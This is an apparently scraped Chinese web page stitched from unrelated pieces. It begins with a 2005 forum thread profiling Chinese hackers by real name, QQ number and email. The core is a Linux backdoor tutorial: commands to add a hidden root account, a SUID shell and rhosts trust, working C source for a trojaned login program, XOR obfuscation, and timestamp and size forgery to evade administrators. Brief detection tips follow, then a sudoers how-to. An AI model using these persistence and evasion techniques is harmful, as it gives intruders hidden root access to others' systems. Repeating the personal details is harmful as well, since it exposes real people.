中国NB的黑客分别是谁？

1 中国著名黑客 不完全档案 网名:janker(孤独剑客) 真实姓名:王献冰 年龄:28 OICQ:5385757 电子信箱:janker@371.net 主页:http;// (孤独剑客) http;// (派客地带) 简介:掌握Asm和C语言的系统网络编程,熟悉Windows和Unix等系统平台的维护与管理,精通前沿的模拟攻击与反黑客技术,能够熟练运用防火墙,扫描仪,入侵检测系统,虚拟私有网,公告密钥体系和身份认证等技术,熟悉相关产品的配置,曾为国内的网站,政府机构,证券,银行,信息港和电子商务网等设计整体安全解决方案并提供专业化安全服务,有着丰富的团队建设,安全项目管理和安全工程实践经验.曾开发出很多的优秀软件,如Winshell,PassDump,SecWiper等,还有早期的系统安全漏洞测试工具IP Hacker等优秀软件.现为世界著名的网络安全公司中国分公司高级安全顾问. 网名:Frankie(老毒物,深圳浪子) 真实姓名:谢朝霞 年龄:不详 OICQ:不详 电子信箱:frankie@163.net 网站:http;// (深圳辰光设计工作室) http;// (安络科技) 简介:中国第一代黑客成员,现是著名的网络安全专家.在"两国论"期间的"海峡黑客对撞风波"和针对由"5.8轰炸我驻南使馆事件"引发的黑客事件中,谢朝霞起着举足轻重的作用.事实上,谢朝霞并不是由于参与攻击别人的网站而著名.谢朝霞是Windows NT高手,1996年初开始从事网络安全研究,对世界范围内各种流行的黑客技术进行详细的记载与分析,专门收集,发现网络系统安全研究.1998年,谢朝霞建立了自己的个人网站"辰光工作室",开始发布自己对近千篇黑客技术文档和2000多个工具的分析心得,公布了大量的网络安全工具,与其他黑客共享.谢朝霞现为深圳安络科技有限公司的副总裁. 网名:sunx 真实姓名:孙华 年龄:27 OICQ:239670 网站:http;// 简介:资深网络安全专家,软件设计师,Unix专家,在黑客,病毒等技术上均具有顶尖水平,对系统内核研究有很高的造诣,程序反编译,跟踪,调试,破解更不在话下,对防火墙技术的研究达到世界领先水平,具有多年从事网络安全的工作经验.他在国内安全技术界具有很高的知名度,曾经多次被电视,电台和报纸报道,被国内多个安全组织聘请为技术顾问.他曾经多次协助政府,公安,军队等机构,追查网络罪犯,领导机密产品研发.现为湖北省公安厅特聘安全顾问,深圳市政府特聘安全专家,深圳市浩天网络安全技术有限公司技术总监,深圳市晓宇软件公司技术顾问,个人作品较多. 作者：222.218.138.* 2005-7-21 23:52 回复此发言 2 回复：中国著名黑客 不完全档案 网名:tianxing(天行) 真实姓名:陈伟山 年龄:25 OICQ;911189 网站:http;// 简介:福建"天行软件王国"站长,中国第一代黑客之一,顾问级网络安全专家,首席软件设计师,理论与实践相结合型.其代表作"网络刺客","网络卫兵"等深受安全人士喜爱,注册用户数以万计,为中国黑客技术研究起着不可磨灭的推动作用,对入侵检测技术的研究达到了世界领先水平.tianxing平时喜好网络游戏,五行八卦,武术,战略研究等.1999年5月8日中国驻南联盟使馆事件发生后,他与一班同盟们将某国的一些知名网站的主页换成了"骷髅旗",目的是告诫其政府中国人民不可辱,在网络上发出了自己的爱国呼声. 网名:goodwel 真实姓名:龚蔚 年龄:不详 OICQ:11120 网站:http;// (绿色兵团) 简介:goodwell于1997年在国外网站申请了一个免费空间并在国内多处做了镜像站点,当初起名为“绿色兵团”，他先后结识了rocky（因车祸已故）、袁哥、backend、blackeyest等人。在他们的共同维护下，绿色兵团主站发展壮大，如今绿色兵团已发展成为亚洲最大的，也是中国最早、最有技术实力的黑客站点。 网名：coldface 真实姓名：周帅 年龄：25 OICQ：87272 电子信箱：coldface@isforce.org 网站：http;// (网络力量） 简介：绿色兵团核心成员，绿色兵团北京站--网络力量网站站长，20岁从江苏老家跑到北京，凭借着自己在计算机上的天赋，熟练掌握了各种操作系统并能对系统的各种漏洞加以利用，有着扎实的计算机水平，为绿色兵团做过很多事情，是个纯org的倡导者。现世纪腾飞公司就职，所从事的职业并非网络安全，但研究网络安全对coldface来说是一种享受。 作者：222.218.138.* 2005-7-21 23:52 回复此发言 3 回复：中国著名黑客 不完全档案 网名：rootshell(fzk) 真实姓名：冯志焜 年龄：28 OICQ：1734398 电子信箱：sysadm@21cn.com 网站：http;//ns-one.com 简介：网络安全专家，毕业于广东省广州市中山大学科学计算与计算机应用系，起初从事网络管理员一职，先后在深圳安络科技有限公司、上海创源公司从事过安全研究工作，现是深圳市浩天网络安全技术有限公司工程部服务经理。曾是国内政府、银行、电信等部门紧急应急负责人及设计者。精通TCP/IP协议、熟悉Unix系统内核与底层，精通Solaris、HP-UX、AIX、*BSD、Linux和Windows NT/2000等操作系统的网络安全配置与管理及网络安全应用等。fzk绝对是一位攻击型“爱国黑客”。他认为“黑客是不分国界的”。 网名：Rocky(因车祸已故） 真实姓名：不详 年龄：不详 网站：http;// (绿色兵团） 简介：请看来自goodwell在绿色兵团网站上对他的介绍：“请允许我把这个人的名字放在第一位，并致以最沉痛的悼念。他是早期的绿色兵团核心成员，某国国防部的Web Site上曾留下过他为祖国的呐喊，绿色兵团早期的文章由他翻译。我依然记得4年前Rocky第一次进入我的Linux时，他的激动和喜悦，然而今天他却永远离开了我们，走得这么突然。我会记得你，大家会记得你，直到永远、永远，我的朋友--Rocky。” 网名：Eagle(大鹰） 真实姓名：艾奇伟 年龄：25 性别：男 OICQ：1949479 电子信箱：e4gle@whitecell.org 主页：http;// 简介：绿色兵团核心成员很有互助精神。大鹰毕业于南航计算机系，在补天网络公司呆了一年，任职技术总监，是补天的得力干将。和.abu.他们都是很要好的朋友，补天公司倾注了他很多心血，但由于和投资商发生了一些矛盾，在2001年6月份辞职来到了北京。他在华泰网络公司做安全顾问，然后当了一段时间的开发组组长，华泰重组后参与了863项目的研发，课题是安全操作系统内核的研发。大鹰熟悉Linux、Solaris、FreeBSD等系统内核和动态链接机制、elf文件格式及各种Exploit攻击技术研究等。大鹰是国内比较有名的LinuxHacker,对Linux内核，Linux病毒和栈溢出、格式化字符串和堆溢出等都有很精深的研究。他曾经发现过多个Linux安全漏洞，例如著名的RedHat Linux利用Ping获取本地root权限等。 作者：222.218.138.* 2005-7-21 23:53 回复此发言 4 回复：中国著名黑客 不完全档案 网名：DigitaBrain 真实姓名：朱建国 年龄：23 性别：男 OICQ：15614487 电子信箱：digitabrain@163.com 主页：http;// 简介：1998年在成都电子科技大学自考计算机专业毕业，1998-2000在四川托普集团进行中间件平台、数控系统等项目的研发工作，2000-2001/8在四川天府热线，从事软，件开发工作；2001/8以后在安盟科技有限责任公司担任技术研发部经理。他精通计算机相关理论科学、DOS 80x86汇编语言，熟悉Win32汇编语言、C/C++、PASCAL，熟练使用Visuall C++、Delphi等开发工具，精通以太网网络协议以及具体的网络应用，对网络安全有较深入的研究。他还精通Window 9x/NT/2000内核级编程，能熟练开发各种低层应用程序，熟悉Unix/Linux下的软件开发与应用，并开发出了很多优秀软件。

风险软件 RootShell

我可以很负责的告诉你,不安全.

它是一个木马

Linux后门技术及实践

作者：出处：黑客基地责任编辑： 方舟 [ 2005-01-15 15:00 ]入侵者完全控制系统后，为方便下次进入而采用的一种技术

--------------------------------------------------------------------------------

后门简介

入侵者完全控制系统后，为方便下次进入而采用的一种技术。

一般通过修改系统配置文件和安装第三方后门工具来实现。 具有隐蔽性，能绕开系统日志，不易被系统管理员发现等特点。

常用后门技术

增加超级用户账号

破解/嗅探用户密码

放置SUID Shell

rhosts + +

利用系统服务程序

TCP/UDP/ICMP Shell

Crontab定时任务

共享库文件

工具包rootkit

可装载内核模块(LKM)

增加超级用户

# echo "e4gle:x:0:0::/:/bin/sh" /etc/passwd

# echo "e4gle::-1:-1:-1:-1:-1:-1:500" /etc/shadow

如果系统不允许uid=0的用户远程登录，还需要增加一个普通用户账号。

破解/嗅探用户密码

获得shadow文件后，用John the Ripper 工具破解薄弱的用户密码。安装sniffit等嗅探工具，监听telnet、ftp等端口，收集用户密码。

放置SUID Shell

# cp /bin/bash /dev/.rootshell

# chmod u+s /dev/.rootshell

普通用户在本机运行/dev/.rootshell，即可获得一个root权限的shell。

rhosts + +

# echo "+ +" /.rhosts

# rsh -l root victim.com csh -i

远程可以得到一个rootshell。

利用系统服务程序

修改/etc/inetd.conf， daytime stream tcp nowait /bin/sh sh -I ；用trojan程序替换in.telnetd、in.rexecd等inted的服务程序

重定向login程序

TCP/UDP/ICMP Shell

BindShell，大部分是基于TCP/UDP协议的网络服务程序，在高端口监听，很容易被发现。Ping Backdoor，通过ICMP包激活后门，形成一个Shell通道。

TCP ACK数据包后门，能够穿越防火墙。

Crontab定时任务

通过Crontab程序调度已安装的后门程序定时运行，一般在深夜时段，是系统管理员不在线的时间。

共享库文件

在共享库中嵌入后门函数使用后门口令激活Shell，获得权限能够躲避系统管理员对二进制文件本身的校验

工具包rootkit

包含一系列系统及后门工具：

- 清除日志中的登录记录

- 伪装校验和

- 替换netstat、ps等网络工具

- 后门登录程序易于安装和使用

可装载内核模块(LKM)

LKM：Loadable Kernel Modules 动态的加载，不需要重新编译内核。

截获系统调用，具有隐藏目录、文件、进程、网络连接等强大功能。

自身隐蔽性好，发现难度较大。

著名的LKM包有adore和knark。

后门的检测

以自己的经验，结合特定的工具，手工作一些检测。

使用Tripwire或md5校验来检查系统。

借助IDS系统，监听到目标机器的可疑网络连接。

实例：login后门

入侵者先把原始的/bin/login备份，再用一段程序替换/bin/login。入侵者telnet登录进来的时候，通过环境变量或者终端类型

传递了正确的后门密码，将直接获得一个Shell；如果是普通用户登录，将会重定向到原始的login文件，来处理正常的登录。

最简单的login后门ulogin.c源代码如下：

实例：login后门

#include stdio.h

#define PASSWORD "passWORD"

#define _PATH_LOGIN "/sbin/logins"

main (argc, argv, envp)

int argc;

char **argv, **envp;

{

char *display = getenv("DISPLAY");

if ( display == NULL ) {

execve(_PATH_LOGIN, argv, envp);

perror(_PATH_LOGIN);

exit(1);

}

if (!strcmp(display,PASSWORD)) {

system("/bin/csh");

exit(1);

}

execve(_PATH_LOGIN, argv, envp);

exit(1);

}

利用后门登录

首先Telnet服务是打开的，在自己机器上：

bash$ export DISPLAY=passWORD

bash$ telnet victim.com

Trying xxx.xxx.xxx.xxx...

Connected to victim.com (xxx.xxx.xxx.xxx).

Escape character is '^]'.

% _

strings命令

strings命令能够打印出二进制文件中的可显示字符串，用于刚才的ulogin程序：

bash$ strings ulogin

/lib/ld-linux.so.2

..............

DISPLAY

/sbin/logins

passWORD

/bin/csh

加密后门密码

1，采用DES算法，即crypt( )函数，编写gen.c程序：

#include unistd.h

main(int argc, char *argv[])

{

if (argc != 3) {

printf("usage: %s password salt\n", argv[0]);

exit(1);

}

printf("%s\n", crypt(argv[1], argv[2]));

}

2、编译为gen，执行./gen hack ui，得到的shadow结果为UiVqMWvDrIQjA。

3、修改后门源程序ulogin.c：

-- 以密文形式的密码代替ulogin.c中define的宏PASSWORD值。

-- 如果后门密码正确，直接给出Shell：

if (!strcmp(PASSWORD, crypt(display,PASSWORD)))

{

system(SHELL);

exit(1);

}

用strings命令只能看到加密过的密码。

采用异或（XOR）算法

以十六进制方式表示字符串，以达到non- printable的效果

1、编码程序encode.c如下：

char magic[]="\x71\x67\x6d\x7a\x65\x61\x7a";

char *de(char *str,char *key)

{

int i=0,j=0,len;

len=strlen(key);

while(str[i] != '\0') {

str[i]^=key[j];

j++;

if(j==len) j=0;

i++;

}

return str;

}

void display(char *str)

{

int i;

for(i=0;istrlen(str);i++) printf("\\x%x",str[i]);

printf("\n");

}

main()

{

char gets[100], *ptr;

ptr=gets;

scanf ("%s",ptr);

de(ptr,magic);display(ptr);

}

2、编译程序encode，依次执行得到关键字符串与magic串异或后的结果，例如原始login的文件名/sbin/xlogin，经过异或后为：

\x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb

3、在后门源代码中这样定义：

Char

login[]="\x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb";

然后插入异或函数char *de（）结合同一magic串，就能判断出正确的后门密码。

用strings命令看不到密码、路径等字符串了。

最后的修饰

使后门程序ulogin的strings输出类似于正常login的strings输出，做法为：

在ulogin.c代码中增加一个字符串数组char strings[] ="";，在引号中填入正常login程序的strings输出结果。

以假乱真，增加迷惑性。

调整后门程序的文件日期、大小等属性：

1、日期

# ls -l /sbin/xlogin

-r-sr-xr-x root root 19300 Feb 11 1998

/sbin/xlogin

# touch -t 199802110000 ulogin

# _

2、调整大小

# ls -l ulogin /sbin/xlogin

-r-sr-xr-x root root 7542 Feb 11 1998 ulogin

-r-sr-xr-x root root 19300 Feb 11 1998 /sbin/xlogin

# bc

19300-7542

11758

# dd if=/sbin/xlogin of=/tmp/t bs=11758 count=1

1+0 records in

1+0 records out

11758 bytes transferred in 0.000379 secs (31016746

bytes/sec)

# cat /tmp/t ulogin

Login后门的检测

使用命令md5sum对现有/bin/login文件作校验，与以前的值作比较。

使用Red Hat Linux的RPM校验：

# rpm -V util-linux

在入侵者已经利用后门登录的情况下，who是看不到用户的，查看系统进程，查找login -h xxx.xxx.xxx.xxx的字样。

--------------------------------------------------------------------------------

在Linux中怎样把普通用户的权限设置为超级用户权限？

普通用户权限设置为超级用户权限方法：

本例将lj123用户权限提升到超级用户

1. 进入超级用户模式。即输入"su",系统会让你输入超级用户密码，输入密码后就进入了超级用户模式。

2. 添加文件的写权限。

chmod u+w /etc/sudoers

3. 编辑/etc/sudoers文件。即输入命令"vim /etc/sudoers"，找到这一行："root ALL=(ALL) ALL"在起下面添加"xxx ALL=(ALL) ALL"(这里的xxx是要改的用户名，本例为lj123)，然后保存

.代码如下:

lj123 ALL=(ALL) ALL

u 这里指文件所有者

+w 添加可写权限

u+x 指只用当前用户具有可写权限

4. 撤销文件的写权限。

.代码如下:

chmod u-w /etc/sudoers